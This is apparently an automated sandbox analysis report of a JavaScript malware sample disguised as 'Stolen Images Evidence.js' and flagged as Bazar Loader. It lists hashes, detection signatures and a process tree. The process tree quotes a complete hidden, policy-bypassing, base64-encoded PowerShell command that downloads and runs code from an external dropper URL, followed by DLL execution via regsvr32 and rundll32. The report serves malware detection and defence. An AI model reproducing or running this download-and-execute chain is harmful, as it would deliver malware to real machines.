Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
14-10-2021 18:11
Static task
static1
Behavioral task
behavioral1
Sample
Stolen Images Evidence.js
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Stolen Images Evidence.js
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
Stolen Images Evidence.js
-
Size
19KB
-
MD5
c62b322046bee6a5a86c4fecf5dee72e
-
SHA1
18a381be8472fcee623c18cb1bfcf938682bef7d
-
SHA256
edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
-
SHA512
2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://bobersok.top/333g100/index.php
Signatures
-
Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
Bazar/Team9 Loader payload 2 IoCs
resource yara_rule behavioral2/memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp BazarLoaderVar6 behavioral2/memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp BazarLoaderVar6 -
Blocklisted process makes network request 1 IoCs
flow pid Process 13 1432 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2888 regsvr32.exe 3472 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1432 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1816 wrote to memory of 4044 1816 wscript.exe 69 PID 1816 wrote to memory of 4044 1816 wscript.exe 69 PID 4044 wrote to memory of 1432 4044 cmd.exe 71 PID 4044 wrote to memory of 1432 4044 cmd.exe 71 PID 1432 wrote to memory of 2888 1432 powershell.exe 72 PID 1432 wrote to memory of 2888 1432 powershell.exe 72
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"1⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat4⤵
- Loads dropped DLL
PID:2888
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat,DllRegisterServer {0E26A7BA-3829-46D1-83AC-21349F83EC06}1⤵
- Loads dropped DLL
PID:3472